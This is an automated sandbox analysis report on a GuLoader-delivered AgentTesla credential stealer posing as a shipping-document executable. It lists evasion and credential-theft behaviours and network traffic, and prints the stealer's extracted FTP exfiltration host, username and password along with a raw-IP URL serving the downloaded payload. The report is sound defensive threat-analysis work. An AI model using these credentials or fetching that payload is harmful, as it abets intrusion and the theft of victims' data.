Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Awb 4586109146.bat.exe

Overview

General Information

Sample name:Awb 4586109146.bat.exe
Analysis ID:1577288
MD5:a3bb238f798a512f7465f804735b8f9a
SHA1:31c7c96a95c22e7f4ab58b0f5330c4c79172be79
SHA256:9775ae8b4fa626011fb022ede69e2ec2bec2b7868bb70bda276da0145b4b410f
Tags:batexeuser-abuse_ch
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Awb 4586109146.bat.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\Awb 4586109146.bat.exe" MD5: A3BB238F798A512F7465F804735B8F9A)
    • Awb 4586109146.bat.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\Awb 4586109146.bat.exe" MD5: A3BB238F798A512F7465F804735B8F9A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.3699835222.0000000007EAE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: Awb 4586109146.bat.exe PID: 2884JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Awb 4586109146.bat.exe PID: 2884JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-18T11:08:09.579335+010028032702Potentially Bad Traffic192.168.2.84971184.38.133.4880TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Awb 4586109146.bat.exeAvira: detected
            Source: Awb 4586109146.bat.exe.2884.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Source: Awb 4586109146.bat.exeVirustotal: Detection: 17%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Awb 4586109146.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: Awb 4586109146.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_00402868 FindFirstFileW,6_2_00402868
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_004059CC
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_004065FD FindFirstFileW,FindClose,6_2_004065FD
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49711 -> 84.38.133.48:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wlSTiHSjDLYgnyIzSMV100.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.48Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.48
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wlSTiHSjDLYgnyIzSMV100.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.48Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: Awb 4586109146.bat.exe, 00000006.00000002.3887463994.00000000064E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.133.48/wlSTiHSjDLYgnyIzSMV100.bin
            Source: Awb 4586109146.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_0040338F
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_00406B150_2_00406B15
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_004072EC0_2_004072EC
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_00404C9E0_2_00404C9E
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_73961B5F0_2_73961B5F
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_00406B156_2_00406B15
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_004072EC6_2_004072EC
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_00404C9E6_2_00404C9E
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_00154A586_2_00154A58
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_00153E406_2_00153E40
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_001541886_2_00154188
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B831586_2_39B83158
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B856A06_2_39B856A0
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B8B2F06_2_39B8B2F0
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B866C06_2_39B866C0
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B800406_2_39B80040
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B87E406_2_39B87E40
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B8C2406_2_39B8C240
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B85DB76_2_39B85DB7
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B823706_2_39B82370
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B877606_2_39B87760
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_39B8E4686_2_39B8E468
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: String function: 00402C41 appears 51 times
            Source: Awb 4586109146.bat.exe, 00000000.00000000.1422465208.0000000000473000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameteth.exej% vs Awb 4586109146.bat.exe
            Source: Awb 4586109146.bat.exe, 00000006.00000002.3887463994.00000000064E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Awb 4586109146.bat.exe
            Source: Awb 4586109146.bat.exe, 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameteth.exej% vs Awb 4586109146.bat.exe
            Source: Awb 4586109146.bat.exeBinary or memory string: OriginalFilenameteth.exej% vs Awb 4586109146.bat.exe
            Source: Awb 4586109146.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@2/2
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 6_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_0040338F
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404722
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile created: C:\Users\user\AppData\Local\sillinessesJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsgED34.tmpJump to behavior
            Source: Awb 4586109146.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Awb 4586109146.bat.exeVirustotal: Detection: 17%
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeFile read: C:\Users\user\Desktop\Awb 4586109146.bat.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Awb 4586109146.bat.exe "C:\Users\user\Desktop\Awb 4586109146.bat.exe"
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess created: C:\Users\user\Desktop\Awb 4586109146.bat.exe "C:\Users\user\Desktop\Awb 4586109146.bat.exe"
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeProcess created: C:\Users\user\Desktop\Awb 4586109146.bat.exe "C:\Users\user\Desktop\Awb 4586109146.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Awb 4586109146.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.3699835222.0000000007EAE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Awb 4586109146.bat.exeCode function: 0_2_73961B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73961B5F
